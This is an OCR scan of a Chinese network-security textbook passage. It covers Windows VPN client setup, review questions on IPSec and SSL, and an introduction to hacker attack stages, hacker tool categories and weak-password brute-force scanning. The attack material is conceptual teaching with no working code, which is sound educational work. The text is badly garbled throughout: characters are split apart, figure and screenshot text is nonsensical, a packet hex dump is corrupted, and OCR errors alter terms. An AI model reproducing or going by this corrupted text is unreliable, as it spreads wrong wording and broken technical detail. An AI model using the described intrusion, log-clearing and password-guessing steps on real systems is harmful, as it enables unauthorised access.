(1) 打开 “网 络 连接 ”窗口 。 在 “网 上 邻居 ”处 单 击 右键 ， 选 择 快捷 菜单 中 的 “ 属 
性 ”命令 ， 打 开 “ 网 络 连接 ”窗口 ， 如 图 4.20 所 示 ， 单 击 “ 创 建 一 个 新 的 连接 ”， 在 弹出 
的 窗口 中 单 击 “ 下 一 步 ”按钮 ， 弹 出 图 4.21 所 示 的 对 话 框 ， 选 中 “连接 到 我 的 工作 场所 的 


网 络 ” 单 选 按钮 ， 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 图 4.22 所 示 的 对 话 框 ， 选 择 “ 虚 拟 专 用 网 络 
连接 ” 单 选 按钮 ， 单 击 “ 下 一 步 ”按钮 ， 弹 出 图 4.23 所 示 的 对 话 框 。 


网 络 连 基 EE] 全 芭 
XMD MR) HW WR IAD BAW #” 


图 4.20 “网 络 连接 ”窗口 


网 六 思拓 A 
售 好 要 让 工作 吉 扣 何 与 下 入” 


下 和 
全 技 号 于 拓 @@) 
Mn ,SF Er 
人 O 明 拓 才 划 网 站 这 于 证) 
癌 设 杰 闻 庭 或 小 型 办 公司 规 G) 们 月 昌 拉 才 用 MEI 王 沁 Isteraet 加 到 9 ， 
和 窜 和 一 侦 有 的 因 局 惑 小 者 办 全 /5 ， 系 考 设置 一 个 和 办 
吕 设 村 高 如 这 按 加 ) 
,I HH 
tt 


Ca FE CW 


图 4.21 网 络 连接 类 型 图 4.22 网 络 连接 


(2) 输入 公司 名 。 在 图 4.23 中 输入 公司 名 ， 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 图 4.24 所 示 的 
对 话 框 ， 在 “公用 网 络 ” 界 面 中 可 以 选择 是 否 在 VPN 连接 前 自动 拨号 。 默 认 选 项 为 “ 自 
动 拨 此 初始 连接 ” 单 选 按钮 ， 需 要 改选 为 “不 拨 初始 连接 ” 单 选 按钮 ， 然 后 单 击 “ 下 一 
步 ” 按 钮 ， 弹 出 图 4.25 所 示 的 对 话 框 。 

(3) 输入 VPN 服务 器 的 卫 地 址 。 在 图 4.25 中 ， 需 要 提供 VPN 服务 器 的 主机 名 或 卫 
地 址 。 在 文本 框 中 输入 VPN 服务 器 的 卫 地 址 ， 本 实验 VPN 服务 器 人 地 址 是 
192.168.10.1， 然 后 单 击 “ 下 一 步 ” 按 钮 ， 弹 出 图 4.26 所 示 的 对 话 框 ， 可 以 勾 选 “在 我 的 
桌面 上 添加 一 个 到 此 连接 的 快捷 方式 ” 复 选 框 ， 然 后 单 击 “完成 ”按钮 。 之 后 会 自动 弹出 
图 4.27 所 示 的 “连接 Win2003” 对 话 框 。 输 入 用 户 名 和 密码 ， 根 据 需 要 勾 选 “为 下 面 用 / 
保存 用 户 名 和 密码 ” 复 选 框 ， 然 后 单 击 “ 连 接 ” 按 钮 。 
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连接 名 
指定 连接 到 多 的 工作 场 亲 的 连接 名 称 - 


公用 同 党 
和 nders 本 以 先 珀 认 公 币 同 阁 旦 殖 已 基 江 。 


在 下 面 框 中 输入 此 连 反 的 名 称 - 如 ”~ 在 如 了 了 克 扒 这 深 之 商 可 以 目 动 浓 到 Thternet 或 瑟 它 公用 网 站 的 科 验 


公司 名 


FE 


例如 ， 悠 本 以 办 和 信 的 工作 地 点 溃 或 交 这 插 的 服 务 器 。 


> 
.和 动 打上 相 这 接 的 


(CEs)E3®) Cw 


[Es 


图 4.23 “连接 名 ”界面 图 4.24 “公用 网 络 ” 界 面 


MW 正在 完成 新建 连接 向 导 


输入 修正 连 搞鬼 计算 机 的 主机 名 或 TP 起 址 - 悠 已 世 功 完成 创建 下 弄 这 接 需 要 的 步 风 


主机 名 或 了? 地 址 人 0 ， tecon 王 157 54.0 1) QD 
192, 188 10.1 


win2003 
“ 与 此 计算 机 上 的 所 有 用 户 共 训 


此 演 接 村 被 存 信 “网 培 连 接 ”文件 严 , 
口 积 要 下 而 上 江天 二 下 济 且 辽 靖 区 本 扼 才 式 吏 ) 


要 创建 此 注 接 并 关闭 身 导 ， 单 击 “ 


CE-SUF-F CW EE-5®]( 


4.25 “VPN 服务 器 选择 ”对 话 框 图 4.26 完成 VPN 服务 器 设置 


连 搁 win2003 


用 户 名 QD): |adninistrator 
密友 | 本 Pet 


加 只 是 我 四 
〇 任何 使 用 此 计算 机 的 人 &) 


连接 CC) ][ ”取消 ”] [ 属性 @) 
图 4.27 “连接 win2003” 对 话 框 


还 注意 : ”此 处 输入 的 用 户 名 应 为 VPN 服务 器 上 已 经 建立 好 ， 并 设置 了 具有 拨 入 服务 
器 权限 的 用 户 ， 密 码 也 为 其 密码 。 
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连接 成 功 之 后 可 以 看 到 ， 双 方 的 任务 栏 右 侧 均 会 出 现 两 个 拨号 网 络 成 功 运行 的 图 标 ， 
其 中 一 个 是 到 Intenet 的 连接 ， 另 一 个 则 是 VPN 的 连接 。 


外 注意 :。 当 双方 建立 好 通过 Intemet 的 VPN 连接 后 ， 即 相当 于 又 在 Internet 上 建立 好 
一 个 双方 专用 的 虚拟 通道 ， 而 通过 此 通道 双方 可 以 在 网 上 邻居 中 进行 互 访 ， 
即 相当 于 又 组 成 了 一 个 局 域 网 络 ， 这 个 网 络 是 双方 专用 的 ， 而 且 具 有 良好 的 
保密 性 能 。VPN 建立 成 功 之 后 ， 双 方便 可 以 通过 全 地 址 或 “网 上 邻居 ”来 
达到 互 访 的 目的 ， 当 然 也 就 可 以 使 用 对 方 所 共享 出 来 的 软 硬 件 资源 了 。 


当 VPN 网 络 建立 成 功 之 后 ，VPN 客户 机 和 VPN 服务 器 ， 或 者 VPN 客户 机 和 VPN 服 
务 器 所 在 的 局 域 网 中 的 其 他 计算 机 ， 进 行 共享 资源 的 互 访 方法 是 ， 在 资源 管理 器 窗口 的 地 
址 栏 中 输入 “\\ 对 方 全 地 址 ”来 访问 对 方 共享 出 的 软 硬 件 资源 。 

如 果 VPN 客户 机 不 能 访问 互联 网 ， 是 因为 VPN 客户 机 使 用 了 VPN 服务 器 定义 的 网 
关 ， 解 决 方法 是 禁止 VPN 客户 机 使 用 VPN 服务 器 上 的 默认 网 关 。 具 体操 作 方法 : 对 于 
Windows XP 客户 机 ， 在 “网 络 和 拨号 连接 ”窗口 中 ， 先 选中 相应 的 连接 名 ， 如 为 win 
2003， 单 击 右 键 ， 选 择 快捷 菜单 中 的 “属性 ”命令 打开 “win 2003 属性 ”窗口 ， 如 图 4.28 
所 示 。 再 转 到 “网 络 ” 选 项 卡 ， 双 击 列表 框 中 的 “Intemet 协议 (TCP/IP)” 选 项 ， 打 开 
“Internet 协议 (TCP/IP) 属 性 ”窗口 。 然 后 单 击 “ 高 级 ”按钮 进入 “高 级 TCP/IP 设置 ” 窗 
的 “常规 ”选项 卡 ， 取 消 勾 选 “ 在 远程 网 络 上 使 用 默认 网 关 ” 复 选 框 即 可 。 


图 4.28 win 2003 网 络 连 接 属性 


复习 思考 题 四 


一 、 填 空 题 

1. 网 络 层 使 用 的 最 主要 的 协议 是 

2. IPSec 的 设计 目标 是 

3. IPSec 主要 由 、_ 和 组 成 。 
4. SSL 维护 数据 完整 性 采用 的 两 种 方式 是 和 


(1. 
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5. 握手 协议 中 客户 机 服务 器 之 间 建 立 连接 的 过 程 分 为 4 个 阶段 : 
和 


6. SSL 协议 分 为 两 层 ， 低 层 是 ， 高 层 是 
二 . 选择 题 
1.TLS 是 工作 在 (  ) 层 的 协议 。 
A. 数据 链 路 B. 网 络 C. 应 用 D. 传输 


2. 下 列 说 法 错误 的 是 ( % 
A. 数据 的 完整 性 未 得 到 保护 
B. 客户 机 和 服务 器 互相 发 送 自己 能 够 支持 的 加 密 算法 时 ， 是 以 明文 传送 的 存在 被 
攻击 修改 的 可 能 
C. 为 了 兼容 以 前 的 版 本 ， 可 能 会 降低 安全 性 
D. 所 有 的 会 话 密 钥 中 都 将 生成 主 密 钥 ， 握 手 协议 的 安全 完全 依赖 于 对 主 密 钥 的 
保护 
3. 下 列 说 法 错误 的 是 ( 。”)。 
A. SSL 的 密 钥 交换 包括 匿名 密 钥 交 换 和 非 匿 名 密 钥 交换 两 种 
B. SSL3.0 使 用 AH 作为 消息 验证 算法 ， 可 阻止 重 放 攻 击 和 截断 连接 攻击 
C. SSL 支持 3 种 验证 方式 
D. 当 服 务 器 被 验证 时 ， 就 有 减少 完全 匿名 会 话 遭 受 中 间 人 攻击 的 可 能 
4. IPSec 是 为 了 弥补 ( ) 协 议 徐 的 安全 缺陷 ， 为 P 层 及 其 上 层 协 议 提供 保护 而 设计 
的 认证 机 制 。 
A.TCP B. OSI C. TCP/IP D.P 
5. 下 列 不 是 SSL 所 提供 的 服务 的 是 ( 。 “)。 
A. 用 户 和 服务 器 的 合法 认证 
B. 加 密 数据 以 隐藏 被 传送 的 数据 
C. 维护 数据 完整 性 
D. 保留 通信 双方 的 通信 时 的 基本 信息 
6. SSL 维护 数据 完整 性 采用 的 两 种 方法 是 ( 。 )。 


A. 散 列 函数 、 公 钥 加 密 B. 数字 签名 、 公 钥 加 密 

C. 散 列 函数 、 机 密 共 享 D. 散 列 函数 、 对 称 加 密 
7. TLS 用 于 在 两 个 通信 应 用 程序 之 间 提 供 (  )。 

A. 保密 性 和 认证 性 B. 保密 性 和 数据 完整 性 

C. 保密 性 和 不 可 否认 性 D. 数据 完整 性 和 不 可 否认 性 
三 . 简 答题 
. 简 述 网 络 各 层 的 安全 协议 。 


. 简 述 IPSec 的 主要 特点 及 其 体系 结构 。 
. 简 述 设计 IKE 的 目的 。 
. 简 述 安全 插口 层 SSL 的 主要 特点 ，SSL 协议 提供 服务 可 以 归纳 为 哪 几 个 方面 ? 
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学 习 目 标 

网 络 安全 漏洞 扫描 是 网 络 安全 体系 中 一 种 重要 的 防御 技术 。 漏 洞 要 描 是 对 计算 机 系统 
或 其 他 网 络 设备 进行 与 安全 相关 的 检测 ， 找 出 安全 隐患 和 可 被 黑客 利用 的 漏洞 。 系 统管 理 员 
利用 漏洞 扫描 软件 检测 出 系统 漏洞 以 便 有 效 地 防范 黑客 入 侵 ， 然 而 黑客 可 以 利用 漏洞 扫描 软 
件 检测 系统 漏洞 以 利于 入 侵 系 统 。 通 过 对 本 章 内容 的 学 习 ， 读 者 应 掌握 及 了 解 以 下 内 容 。 

@ 掌握 网 络 漏洞 的 分 类 及 其 存在 的 原因 ， 网 络 漏洞 扫描 技术 。 

@ 了解 常 见 的 网 络 漏洞 扫描 工具 。 


5.1 黑客 攻击 简介 
黑客 攻击 是 当今 互联 网 安全 的 主要 威胁 。 
5.1.1 黑客 攻击 的 目的 和 手段 


1. 黑客 攻击 的 目的 


不 同 黑客 进行 攻击 的 目的 也 不 尽 相 同 ， 有 的 黑客 是 为 了 窃取 、 修 改 或 者 删除 系统 中 的 
相关 信息 ， 有 的 黑客 是 为 了 显示 自己 的 网 络 技术 ， 有 的 黑客 是 为 了 商业 利益 ， 而 有 的 黑客 
是 出 于 政治 目的 等 。 

2. 黑客 攻击 的 手段 
客 攻击 可 分 为 非 破坏 性 攻击 和 破坏 性 攻击 两 类 。 

(1) 非 破坏 性 攻击 。 一 般 是 为 了 扰乱 系统 的 运行 ， 并 不 盗窃 系统 资料 ， 通 常 采用 拒绝 
服务 攻击 或 信息 炸弹 的 方式 。 

(2) 破坏 性 攻击 。 这 是 以 侵入 他 人 计算 机 系统 、 盗 窃 系 统 保密 信息 、 破 坏 目标 系统 
的 数据 为 目的 。 

黑客 常用 的 攻击 手段 有 密码 破解 、 后 门 程序 、 电 子 邮 件 攻 击 、 信 息 炸 弹 、 拒 绝 服务 、 
网 络 监听 、 利 用 网 络 系统 漏洞 进行 攻击 、 上 暴 库 、 注 入 、 旁 注 、Cookie 诈骗 、WWW 的 欺骗 
技术 等 。 


5.1.2 ”黑客 攻击 的 步骤 


黑客 入 侵 系 统 的 最 终 目标 一 般 是 获得 目标 系统 的 超级 用 户 ( 管 理 员 ) 权 限 ， 对 目标 系统 
进行 绝对 控制 ， 窃 取 其 中 的 机 密 文 件 等 重要 信息 。 黑 客 入 侵 的 步骤 如 图 5.1 所 示 ， 一 般 可 
以 分 为 3 个 阶段 ， 即 确定 目标 与 收集 相关 信息 、 获 得 对 系统 的 访问 权 、 隐 藏 踪迹 。 

1. 确定 目标 与 收集 相关 信息 

黑客 对 一 个 大 范围 的 网 络 进行 扫描 以 确定 潜在 的 入 侵 目标 ， 锁 定 目标 后 ， 还 要 检查 要 
被 入 侵 目标 的 开放 端口 ， 并 且 进 行 服务 分 析 ， 获 取 目 标 系统 提供 的 服务 和 服务 进程 的 类 型 
和 版 本 、 目 标 系统 的 操作 系统 类 型 和 版 本 等 信息 ， 看 是 否 存在 能 够 被 利用 的 服务 ， 以 寻找 
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该 主机 上 的 安全 漏洞 或 安全 弱点 。 


扫描 | .| 确定 | .| 收集 
网 络 骨 上 | 信息 


5.1 黑客 入 侵 的 步骤 


2. 获得 对 系统 的 访问 权力 
当 黑 客 探测 到 足够 的 系统 信息 ， 对 系统 的 安全 弱点 有 所 了 解 后 就 会 发 动 攻击 ， 不 过 
客 会 根据 不 同 的 网 络 结构 、 不 同 的 系统 情况 采用 不 同 的 攻击 手段 。 
黑客 利用 找到 的 这 些 安全 漏洞 或 安全 弱点 ， 试 图 获取 未 授权 的 访问 权限 ， 比 如 利用 组 
冲 区 溢出 或 蛮 力 攻击 破解 口令 ， 然 后 登录 系统 。 然 后 再 利用 目标 系统 的 操作 系统 或 应 用 程 
序 的 漏洞 ， 试 图 提升 在 该 系统 中 的 权限 ， 获 得 管理 员 权限 。 
黑客 获得 控制 权 之 后 ， 不 会 马上 进行 破坏 活动 ， 不 会 立即 删除 数据 、 涂 改 网 页 等 。 一 
股 入 侵 成 功 后 ， 黑 客 为 了 能 长 时 间 保 留 和 巩固 他 对 系统 的 控制 权 ， 为 了 确保 以 后 能 够 重新 进 
入 系统 ， 黑 客 会 更 改 某 些 系统 设置 、 在 系统 中 置 入 特洛伊 木马 或 其 他 一 些 远程 控制 程序 。 
黑客 下 一 步 可 能 会 窃取 主机 上 的 软件 资料 、 客 户 名 单 、 财 务 报 表 、 信 用 卡号 等 各 种 敏 
感 信 息 ， 也 可 能 什么 都 不 做 ， 只 是 把 该 系统 作为 他 存放 黑客 程序 或 资料 的 仓库 ， 黑 客 也 可 
能 会 利用 这 台 已 经 攻陷 的 主机 去 继续 他 下 一 步 的 攻击 ， 如 继续 入 侵 内 部 网 络 或 者 将 这 台 主 
机 作为 DDoS 攻击 的 一 员 。 


3. 隐藏 踪迹 


一 般 入 侵 成 功 后， 黑客 为 了 不 被 管理 员 发 现 ， 会 清除 日 志 、 删 除 复制 的 文件 、 隐 藏 自 
己 的 踪迹 。 日 志 往往 会 记录 一 些 黑客 攻击 的 蛛丝马迹 ， 黑 客 会 删除 或 修改 系统 和 应 用 程序 
日 志 中 的 数据 ， 或 者 用 假日 志 覆 盖 它 。 


5.1.3 黑客 入 门 


湖 
38 


黑客 (Hacker) 是 指 那些 尽力 挖掘 计算 机 程序 功能 最 大 潜力 的 计算 机 用 户 ， 依 靠 自 己 掌 
握 的 知识 帮助 系统 管理 员 找 出 系统 中 的 漏洞 并 加 以 完善 。 

骇 客 (Cracker) 是 通过 各 黑客 技术 对 目标 系统 进行 攻击 、 入 侵 或 者 做 其 他 一 些 有 害 于 目 
标 系统 或 网 络 的 事情 。 

今天 “黑客 ”和 “ 骇 客 ” 的 概念 已 经 被 人 们 混淆 ， 一 般 都 用 来 指 代 那 些 专门 利用 计算 
机 和 网 络 搞 破 坏 或 恶作剧 的 人 。 

无 论 是 “黑客 ”还 是 “ 骇 客 ”， 他 们 最 初学 习 的 内 容 都 是 本 部 分 所 涉及 的 内 容 ， 而 且 
掌握 的 基本 技能 也 都 是 一 样 的 。 

下 面 介 绍 一 些 常用 的 网 络 命令 ， 如 ping、ipconfig、arp、nbtstat、netstat、tracert、 
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net、at、route、nslookup、ftp 和 telnet。 


5.1.4 黑客 工具 


黑客 工具 可 以 分 为 七 大 类 ， 即 信息 搜 


密码 破解 类 、 伪 装 类 及 Net Cat。 


1. 信息 搜集 类 
这 息 搜集 软件 的 种 类 比较 多 ， 包 括 端 


还 有 监听 网 络 流 、 截 获 数据 包 等 间 恋 类 软 


监听 软件 Analyzer 3.0a12 的 工作 界 


polito.it/tools。 
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集 类 、 漏 洞 扫描 类 、 远 程控 制 类 、 信 息 炸弹 类 、 


扫描 、 漏 洞 扫描 、 弱 口令 扫描 等 扫描 类 软件 ， 
件 ， 这 些 软件 都 是 亦 正 亦 牙 的 软件 ， 无 论 是 正派 


黑客 、 邪 派 黑 客 、 系 统管 理 员 还 是 一 般 的 计算 机 用 户 ， 都 可 以 使 用 这 些 软 件 实现 各 自 不 同 
的 目的 。 


[如 图 5.2 所 示 ， 其 下 载 地 址 为 http://netgroup. 
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图 5.2 监听 软件 Analyzer 的 工作 界面 


监听 软件 Wireshark 的 工作 界面 如 图 5.3 


所 示 ， 其 下 载 地 址 为 http://www.wireshark. org。 


第 5 章 


网 络 漏洞 扫描 技术 惕 ,。 


Eilter pees Ce By 


01:00), DSt: Xerox_00:00;00 CO1:0! 
7 bens 22 7 23s 


port: netp [30) 
Destinacion port: health-polling C161) 
Seouence nunber: 1 (relarfve sequence nunmoer) 
[Next sequence nunber: 312 [ralstive sequance number)] 
Acknowledgenent nunber; 373 Crelative ack nunber) 
Header length: 20 byres 
Flags: Dyd8 (psH, XX) 
window st1z2e: 6924 
Dy Chechsun: 0x5c90 [correcr] 
+ Hypertext Transfer Protccol 


而 的 中 巩 贡 的 的 的 和 本 21000 0 00 0 6450 
0010 0 5F f6 4c 40 00 37 06 alcscaac17397b05 

0020 4d =7 

0039 8 54 54 50 2¥ 31 2 

0040 30 36 弛 590 044 夺 列 533 

‘9050 2c 20 31 30 20 4d 61 72 260 32 30 30 3 

0050 33 30 36 3a 33 38 20 47 4d 54 0d Oa 53 

0070 65 72 33 20 41 70 61 63 2 

0089 37 Od 03 43 61 63 68 65 

0099 3a 20 6d Sl 78 20 81 87 pa-ag 315350 
opag 39 30 30 0g 04 45 78 70 O00. .Exp res: Th 
00b9 75 2c 20 30 38 20 4d ol 

00c9 30 33 30 36 3a 33 38 20 

9099 74 2d Ad fF 64 5 66 55 

‘0090 20 32 35 20 $3 65 70 20 


OOFD 33 34 34 33 39 20 47 3 


‘0109 20 22 66 31 38 31 32 38 a -431 为 


TCRTS Ta ea 


5.3 ”监听 软件 Wireshark 的 工作 界面 
2. 漏洞 扫描 类 


(1) 扫描 器 X-Scanner 的 工作 界面 如 图 5.4 所 示 ， 其 下 载 地址 为 http://www.xfocus.org/。 
(2) 扫描 器 Superscan。Superscan 是 一 个 功能 强大 的 扫描 器 ， 扫 描 速 度 非常 快 。 
(3) 扫描 器 流光 。 它 是 一 款 国产 软件 ， 是 许多 黑客 手中 必 备 工具 之 一 。 


Scan v3.3 5UI 


文件 内 设置 如 查看 &) 工具 Q) Luaeuree 帮助 2) 


: os 25/tcp 
: 天! Be 
天 


: S002/tep ~ a 可 能 渗 行 于 二 口 


图 5.4 扫描 器 X-Scanner 的 工作 界面 
- 远程 控制 类 
远程 控制 类 的 工具 ， 比 如 木马 程序 。 
4. 信息 炸弹 类 
半 息 炸弹 类 工具 ， 比 如 邮件 炸弹 、Dos 或 DDoS 攻击 。 
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5. 密码 破解 类 

保障 网 络 安全 最 主要 的 方法 是 加 密 机 制 ， 黑 客 可 以 获得 一 份 密码 文件 ， 但 是 如 果 没 有 
加 密 算法 或 者 不 知道 密码 ， 那 么 必须 要 使 用 密码 破解 类 软件 ， 这 类 软件 可 以 用 密码 字典 或 
者 穷 举 法 (暴力 破解 ) 来 解密 。 

6. 伪装 类 

网 络 上 进行 的 各 种 操作 如 果 没 有 经 过 很 好 的 伪装 都 会 被 ISP、 服 务 器 记录 下 来 ， 然 后 
被 反 跟 踪 技 术 追 查 到 自己 的 大 概 物理 位 置 ， 为 了 不 被 发 现 ， 可 以 使 用 这 类 软件 。 

7. Net Cat 


Net Cat 是 一 个 用 途 广泛 的 TCP 和 UDP 连接 工具 ， 对 系统 管理 员 以 及 网 络 调试 人 员 而 
，Net Cat 是 一 个 非常 有 用 的 工具 。 不 过 ，Net Cat 也 是 一 个 攻击 网 络 的 强大 工具 。 


5.2 网络 漏洞 扫描 技术 


每 个 系统 都 有 漏洞 ， 攻 击 者 总 可 以 发 现 一 些 可 利用 的 特征 和 配置 缺陷 。 漏 洞 大 体 上 分 
为 两 大 类 : @ 软件 编写 错误 造成 的 漏洞 ，@ 软件 配置 不 当 造 成 的 漏洞 。 漏 洞 扫描 工具 均 
能 检测 以 上 两 种 类 型 的 漏洞 。 安 全 漏洞 扫描 是 网 络 安全 防护 技术 的 一 种 ， 其 可 以 对 计算 机 
网 络 内 的 网 络 设备 或 终端 系统 和 应 用 等 进行 检测 与 分 析 ， 查 找 出 其 中 存在 的 缺陷 的 漏洞 ， 
协助 相关 人 员 修 复 或 采取 必要 的 安全 防护 措施 来 消除 或 降低 这 些 漏 洞 ， 进 而 提升 计算 机 网 
络 的 安全 性 能 。 


5.2.1 存在 漏洞 的 原因 


ID 


计算 机 与 网 络 漏洞 的 存在 是 不 可 避免 的 。TCP/IP 协议 簇 是 目前 使 用 最 为 广泛 的 网 络 互 
联 协议 徐 , 但 TCP/IP 协议 在 设计 时 是 将 它 置 于 可 信任 的 环境 之 下 的 ， 并 将 网 络 互联 和 开 
放 性 作为 首要 考虑 的 问题 ， 而 没有 过 多 地 考虑 安全 性 ， 这 就 造成 了 TCP/IP 协议 簇 本 身 的 
不 安全 性 ， 导 致 一 系列 基于 TCP/IP 的 网 络 服务 的 安全 性 也 相当 脆弱 。TCP/IP 协议 栈 是 造 
成 网 络 漏洞 的 主要 原因 。 

(1) TCP/IP 设计 之 初 主要 强调 的 是 互联 互通 ， 许 多 协议 的 内 容 并 未 考虑 安全 因素 。 

(2) TCP/IP 协议 栈 的 实现 是 由 程序 员 完 成 的 ， 有 可 能 有 意 无 意 地 引入 漏洞 。 

(3) 网 络 技术 的 高 复杂 性 决定 不 能 通过 技术 手段 来 发 现 所 有 的 漏洞 。 

此 外 ， 应 用 软件 系统 的 漏洞 分 为 两 种 : 一 是 由 于 操作 系统 本 身 设 计 缺 陷 带 来 的 安全 漏 
洞 ， 这 种 漏洞 将 被 运行 在 该 系统 上 的 应 用 程序 所 继承 ; 二 是 应 用 软件 程序 的 安全 漏洞 。 在 
一 些 网 络 系统 中 忽略 了 安全 策略 的 制定 ， 即 使 采取 了 一 定 的 网 络 安全 措施 ， 但 由 于 系统 的 
安全 配置 不 合理 或 不 完整 ， 安 全 机 制 没有 发 挥 作 用 。 或 者 在 网 络 环境 发 生变 化 后 ， 由 于 没 
有 及 时 更 改 系统 的 安全 配置 而 造成 安全 漏洞 。 
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5.2.2 ”安全 漏洞 的 类 型 


安全 漏洞 具有 多 方面 的 属性 ， 也 就 可 以 从 多 个 维度 对 其 进行 分 类 ， 重 点 关注 基于 技术 
的 维度 。 

1. 基于 利用 位 置 的 分 类 

1) 本 地 漏洞 

本 地 漏洞 是 指 需要 操作 系统 级 的 有 效 账 号 登录 到 本 地 才能 利用 的 漏洞 ， 主 要 构成 为 权 
限 提升 类 漏洞 ， 即 把 自身 的 执行 权限 从 普通 用 户 级 别提 升 到 管理 员 级 别 。 

实例 : Linux Kernel 2.6 udev Netlink 消息 验证 本 地 权限 提升 漏洞 ( CVE-2009-1185 )。 

攻击 者 需要 以 普通 用 户 身 份 登录 到 系统 ， 通 过 利用 漏洞 把 自己 的 权限 提升 到 root 
户 ， 获 取 对 系统 的 完全 控制 。 

2) 远程 漏洞 

无 需 系统 级 的 账号 验证 即 可 通过 网 络 访问 目标 进行 利用 的 漏洞 称 为 远程 漏洞 ， 这 里 强调 
的 是 系统 级 账号 ， 如 果 漏 洞 利用 需要 诸如 FTP 用 户 这 样 应 用 级 的 账号 要 求 也 算是 远程 漏洞 。 

实例 : Microsoft Windows DCOM RPC 接口 长 主机 名 远程 缓冲 区 溢出 漏洞 (MS03- 
026)(CVE-2003-0352)。 

攻击 者 可 以 远程 通过 访问 目标 服务 器 的 RPC 服务 端口 ， 无 需 用 户 验证 就 能 利用 漏洞 ， 
以 系统 权限 执行 任意 指令 ， 实 现 对 系统 的 完全 控制 。 

2. 基于 威胁 类 型 的 分 类 

1) 获取 控制 

获取 控制 类 的 安全 漏洞 可 以 导致 劫持 程序 执行 流程 ， 转 向 执行 攻击 者 指定 的 任意 指令 
或 命令 ， 控 制 应 用 系统 或 操作 系统 。 威 胁 最 大 ， 同 时 影响 系统 的 机 密 性 、 完 整 性 ， 甚 至 在 
需要 的 时 候 可 以 影响 可 用 性 。 主 要 来 源 是 内 存 破 坏 类 、CGI 类 漏洞 。 

2) 获取 信息 

获取 信息 类 的 安全 漏洞 可 以 导致 劫持 程序 访问 预期 外 的 资源 并 泄露 给 攻击 者 ， 影 响 系 
统 的 机 密 性 。 它 的 主要 来 源 是 输入 验证 类 、 配 置 错误 类 漏洞 。 

3) 拒绝 服务 

拒绝 服务 类 的 安全 漏洞 可 以 导致 目标 应 用 或 系统 暂时 或 永久 性 地 失去 响应 正常 服务 的 
能 力 ， 影 响 系统 的 可 用 性 。 它 的 主要 来 源 是 内 存 破 坏 类 、 意 外 处 理 错 误 处 理 类 漏洞 。 


3. 基于 技术 类 型 的 分 类 
基于 漏洞 成 因 技 术 的 分 类 相 比 上 述 两 种 维度 要 复杂 得 多 ， 对 于 目前 所 见 过 的 漏洞 大 致 归 
纳 为 内 存 破 坏 类 、 逻 辑 错误 类 、 输 入 验证 类 、 设 计 错 误 类 、 配 置 错误 类 等 几 类 。 
5.2.3 ”安全 漏洞 扫描 技术 的 分 类 
目前 进行 安全 漏洞 扫描 时 遵循 的 策略 大 致 可 以 分 为 两 种 ， 即 主动 式 与 被 动 式 。 其 中 主 
动 式 安全 漏洞 扫描 策略 可 以 利用 网 络 进行 系统 自 检 ， 根 据 主 机 的 响应 可 以 了 解 和 掌握 主 
-0 


三 


mm 计算 机 网 络 信息 安全 (第 2 版 ) 


操作 系统 、 服 务 以 及 程序 中 是 否 存在 漏洞 需要 修复 。 被 动 式 安全 漏洞 扫描 策略 可 以 在 服务 
器 的 基础 上 对 计算 机 网 络 内 的 多 项 内 容 进 行 扫描 与 检测 ， 进 而 生成 检测 报告 反馈 给 网 络 管 
理 人 员 供 其 分 析 与 处 理 所 发 现 的 漏洞 。 

1. 基于 端口 扫描 的 漏洞 分 析 法 

针对 网 络 安全 的 入 侵 行为 通常 都 是 会 扫描 目标 主机 的 某 些 端口 ， 并 查看 这 些 端口 中 是 
否 存 在 某 些 安全 漏洞 而 实现 的 ， 因 而 在 进行 漏洞 扫描 时 可 以 在 网 络 通 向 目标 主机 的 某 些 端 
发 送 特定 的 信息 以 便 获 得 某 些 端口 信息 ， 并 根据 这 些 信 息 来 判断 和 分 析 目 标 主机 中 是 否 
存在 漏洞 。 以 UNIX 系统 为 例 ，Finger 服务 允许 入 侵 者 通过 其 获得 某 些 公开 信息 ， 对 该 服 
务 进行 扫描 可 以 测试 与 判断 目标 主机 的 Finger 服务 是 否 开放 ， 进 而 根据 判断 结果 进行 漏洞 
修复 。 


2. 基于 暴力 的 用 户口 令 破 解法 


为 提升 网 络 用 户 的 安全 性 能 ， 大 多 数 网 络 服务 都 设置 了 用 户 名 与 登录 密码 ， 并 为 不 同 
的 用 户 分 配 了 相应 的 网 络 操作 权限 。 若 能 够 对 用 户 名 进行 破解 则 可 以 获取 相应 的 网 络 访问 
权限 ， 进 而 对 网 络 带 来 安全 威胁 。 

(1) POP3 弱 口 令 漏洞 扫描 。 POP3 是 一 类 常用 的 邮件 收发 协议 ， 该 协议 使 用 用 户 名 与 
密码 来 进行 邮件 收发 操作 。 对 其 进行 漏洞 扫描 时 可 以 首先 建立 一 个 用 户 标 识 与 密码 文档 ， 
该 文档 中 存储 着 常见 的 用 户 标识 与 登录 密码 ， 且 支持 更 新 。 然 后 在 进行 漏洞 扫描 操作 时 可 
以 与 POP3 所 使 用 的 目标 端口 进行 连接 ， 确 认 该 协议 是 否 处 于 认证 状态 。 具 体操 作 : 将 上 
户 标 识 发 送 给 目标 主机 ， 然 后 分 析 目 标 主机 返回 的 应 答 结果 ， 若 结果 中 包含 失败 或 错误 信 
息 ， 则 说 明 该 标识 是 错误 不 可 用 的 ， 若 结果 中 包含 成 功 信 息 ， 则 说 明 身 份 认证 通过 ， 进 一 
步 向 目标 主机 发 送 登 录 密码 ， 仿 照 上 述 过 程 判断 返回 指令 。 该 方式 可 查找 出 计算 机 网 络 中 
存在 的 弱 用 户 名 与 密码 。 

(2) FTP 弱 口 令 漏洞 扫描 。FTP 是 一 类 文件 传输 协议 ， 其 通过 FTP 服务 器 建立 与 用 户 
的 连接 ， 进 而 实现 文件 的 上 传 与 下 载 。 通 过 这 类 协议 进行 漏洞 扫描 方法 与 POP3 方法 类 
似 ， 不 同 的 是 扫描 时 所 建立 的 连接 为 Socket 连接 ， 用 户 名 发 送 分 为 匿名 指令 与 用 户 指令 两 
种 ， 若 允许 匿名 登录 则 可 直接 登录 到 FTP 服务 器 中 ， 若 不 允许 匿名 登录 则 按照 POP3 口令 
破解 的 方式 进行 漏洞 扫描 。 

3. 基于 漏洞 特征 码 的 数据 包 发 送 与 漏洞 扫 描 

系统 或 应 用 在 面 对 某 些 特殊 操作 或 特殊 字符 时 可 能 会 出 现 安全 问题 ， 为 检测 这 种 类 型 
的 漏洞 可 以 使 用 特征 码 的 方式 向 目标 主机 端口 发 送 包含 特 征 码 的 数据 包 ， 通 过 主机 返回 的 
信息 判断 其 中 是 否 存在 漏洞 、 是 否 需要 进行 漏洞 修复 。 

